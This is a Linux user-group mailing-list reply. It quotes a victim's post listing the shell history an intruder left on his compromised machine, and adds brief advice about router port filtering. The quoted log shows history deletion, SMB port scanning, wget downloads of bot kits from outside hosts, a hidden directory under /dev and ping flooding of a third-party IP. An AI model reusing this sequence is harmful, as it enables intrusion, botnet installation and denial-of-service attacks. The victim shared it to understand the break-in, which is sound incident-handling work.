Wow that is nasty.
I have DSL and I use a Linksys router. I hid behind the router using 
only the ports necessary to achieve my needs.  Everyone in the house has 
access to the internet but only the ports I need are enabled to receive 
or send data.  I've run several port scanners against my system form 
other locations and have had very good results.


PHPTOm wrote:

>I think I have found the answer to my problems.  I got into a shell using
>disc 1 of the installation cds.  I switched to super user mode and saw
>various commands in the history that were not mine.  Someone got in earlier
>this week and did some bad things to my system.  Below is the history if
>anyone is interested in seeing what they were up to.  Any explanation of
>what they did is welcome.  It was pretty much a fresh install, so I wiped
>the disc and I am reinstalling.  I think I need to learn much more about
>security.
>
>TOm
>
>
>
>
>
>
>history
>rm -rf .bash_history
>ls -al
>w
>cd /tmp/.cfg/
>cd samba
>./scan 217 139 97 1
>./scan 62 139 217 98
>./serv 67.160.4.66
>./scan 67 139 160 4
>./scan 217 139 0 1
>ls -alF
>cat /etc/issue
>tar
>cd /tmp
>cd sh
>ls -alF
>tar -xzvf sh.tgz
>exit
>id
>wget djcc.go.ro/bios.tgz
>tar -xzvf bios.tgz
>tar -xzvf bios.tgz
>ls
>rm -rf bios.tgz
>ls
>ps -aux
>cat /proc/cpuinfo
>exit
>chmod 700 inst
>chmod +x inst
>exit
>mkdir /dev/targa
>cd /dev/targa
>wget mihai-doini.org/bot.tgz
>tar -xzvf bot.tgz
>exit
>ping -s -f 203.144.243.10 65500&
>ping -f -s 203.144.243.10 65500&
>ping -s -f 203.144.243.10 65500&
>ls
>cd /
>ping -s -f 203.144.243.10 65500&
>history | more
>history | vim
>history -w /tmp/hist.txt
>
>
>
>_______________________________________________
>TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
>http://www.mn-linux.org tclug-list at mn-linux.org
>https://mailman.real-time.com/mailman/listinfo/tclug-list
>
>  
>



_______________________________________________
TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
http://www.mn-linux.org tclug-list at mn-linux.org
https://mailman.real-time.com/mailman/listinfo/tclug-list